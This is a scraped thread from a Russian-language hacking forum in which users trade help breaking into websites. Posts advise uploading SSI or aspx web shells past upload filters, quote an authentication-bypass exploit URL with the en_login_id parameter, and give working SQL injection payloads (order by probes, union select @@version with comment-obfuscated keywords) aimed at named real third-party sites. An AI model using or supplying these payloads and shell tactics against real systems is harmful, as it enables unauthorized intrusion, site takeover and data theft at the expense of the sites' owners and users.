18.03.2012, 18:50
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от faza02
при заливке php, вылезает 500 ошибка, php[2-5] показываются как текст, а phtml скачивается
есть какие-нибудь варианты что можно сделать?
заливай SSI шелл. не раз спасал уже.
POSTBIT TEST
|
|
|
18.03.2012, 18:53
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от qaz
блин, чёт так не выходит в первом варианте, окончание не обрезается
во втром ничего не происходт
вот вот,сам ломаю голову
POSTBIT TEST
|
|
|
|
18.03.2012, 19:16
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 2
Провел на форуме:
123653
Репутация:
0
|
|
Сообщение от xcedz
4.4.1 and earlier,
when register_globals is enabled
, allows remote attackers to bypass authentication, and gain the ability to execute arbitrary code, via the en_login_id parameter.
http://www.exploit-db.com/exploits/2588/
Из эксплойта там строчка http://[target]/[path]/admin.php?action=users&en_login_id=0
перейдя по которой я ничего сделать не могую
Также описывается что можно редактировать config2.php или любую другую страничку но и этого не могу
POSTBIT TEST
|
|
|
|
18.03.2012, 19:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
OxoTnik, нет, все так же 500
Boolean, SSI doesn't work
POSTBIT TEST
|
|
|
|
18.03.2012, 21:11
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Код:
http://www.surbor.su/enicinfo.php?id=22+order+by+100+--+
не думается...
POSTBIT TEST
|
|
|
|
18.03.2012, 21:16
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
shadowrun,
Код:
http://www.surbor.su/enicinfo.php?id=22/**/Order/**/by/**/11--+d true
Делаем запрос:
Код:
http://www.surbor.su/enicinfo.php?id=-1+union+all+select+null,@@version,null,null,null,null,null,null,null,null,null,null--
Soulk3r,
посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
POSTBIT TEST
|
|
|
|
18.03.2012, 23:58
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Код:
http://www.studyguide.ru/schools.php?id=817%27+uni/**/On+Sel/**/Ect+1+--+
хз
POSTBIT TEST
|
|
|
|
19.03.2012, 01:40
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 2
Провел на форуме:
123653
Репутация:
0
|
|
Ereee,
Сообщение от None
посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
Если не выходит найти phpinfo(); и Эксплойт не пашет значит Rg=off ? и тогда эту багу нельзя юзать ?
POSTBIT TEST
|
|
|
|
19.03.2012, 17:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
POSTBIT TEST
|
|
|
|
19.03.2012, 18:09
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
POSTBIT TEST
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
